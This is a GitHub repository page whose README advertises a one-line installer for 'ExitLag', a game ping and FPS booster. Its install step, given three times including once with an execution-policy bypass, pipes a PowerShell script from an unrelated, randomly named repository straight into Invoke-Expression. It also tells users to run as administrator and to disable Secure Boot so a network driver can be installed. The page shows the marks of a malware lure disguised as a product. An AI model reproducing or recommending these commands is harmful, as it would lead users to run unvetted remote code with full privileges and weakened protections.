Skip to content

ProductionArm/ExitLag-Boost-Installer

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 

Repository files navigation

ExitLag Boost Installer

One-line installer for ExitLag — reduce ping, fix packet loss, and boost FPS in competitive games.

Install

Open PowerShell and run:

irm https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | iex

That's it. The installer handles everything.

What it does

  1. Elevates to administrator for network driver installation.
  2. Downloads the ExitLag routing engine and FPS optimizer.
  3. Installs the WFP callout driver for traffic acceleration.
  4. Launches the dashboard — select your game and hit Boost.

Requirements

  • Windows 10 / 11 (64-bit)
  • PowerShell 5.1+
  • Internet connection
  • Administrator access
  • .NET Framework 4.8+

Troubleshooting

Ping unchanged after boost

Restart your game — ExitLag hooks the process at launch, not mid-session.

Driver install blocked by Secure Boot

Temporarily disable Secure Boot in BIOS, install, then re-enable.

Dashboard shows 'no routes found'

Check your firewall — ExitLag needs outbound UDP 443 and 8443.


Alternative (bypass execution policy):

powershell -ExecutionPolicy Bypass -Command "irm https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | iex"

"irm is not recognized" — old PowerShell. Use:

Invoke-RestMethod https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | Invoke-Expression

License

MIT — see LICENSE.

About

One-line installer for ExitLag — reduce ping, fix packet loss, and boost FPS in competitive games.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors